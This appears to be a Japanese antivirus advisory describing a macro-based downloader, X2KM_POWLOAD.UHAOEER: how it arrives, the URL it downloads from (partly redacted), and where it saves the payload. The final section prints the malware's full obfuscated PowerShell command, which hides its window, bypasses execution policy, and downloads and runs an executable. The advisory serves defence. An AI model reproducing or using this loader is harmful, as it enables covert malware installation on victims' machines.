X2KM_POWLOAD.UHAOEER

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。 マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、ダウンロードしたファイルを実行します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。

侵入方法

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

• http://{BLOCKED}m.com/headtop.gif

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

• %User Profile%\Documents\{random numbers}.exe

(註：%User Profile% フォルダは、Windows 2000、XP および Server 2003 の場合、通常、"C:\Documents and Settings\＜ユーザ名＞"、Windows Vista 、 7 、8、8.1 、Server 2008 および Server 2012の場合、"C:\Users\＜ユーザ名＞" です。.)

マルウェアは、ダウンロードしたファイルを実行します。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

その他

エクセルファイルには以下の内容が表示され、マクロを有効にするようユーザを促します。

マルウェアは以下のPowerShellコマンドを利用して、不正なファイルをダウンロードして実行します。

• POweRsHElL -noLOGO -NOeXIt -noNINTERAcTIV -WInDO hiDden -EXecUtionP bYpAss -nOpROFil "Sv bXzO91 ([tYPe](\"{2}{1}{0}\"-F 'MenT','IroN','ENv')); do{.(\"{1}{0}\" -f'p','slee') 41;$lenovo = (geT-chilDITEm VaRiABle:bxzo91 ).vaLUe::(\"{2}{0}{3}{1}\"-f 'tF','rPath','Ge','olde').Invoke(('My'+'Do'+'cu'+'me'+'nts'));(.(\"{1}{3}{0}{2}\" -f'c','New-Obj','t','e') sY`STem.Net.`w`EBcl`IEnT).\"do`WnLOaDF`i`lE\".\"iN`VoKe\"(('ht'+'tp:'+'//'+'{BLOCKED}'+'{BLOCKED}m.c'+'om/hea'+'dtop.'+'gi'+'f'),\"$lenovo\\{random numbers}.exe\")}while(!$?);&(\"{1}{0}{2}\"-f'ro','Start-P','cess') $LEnOvo\{random numbers}.eXE"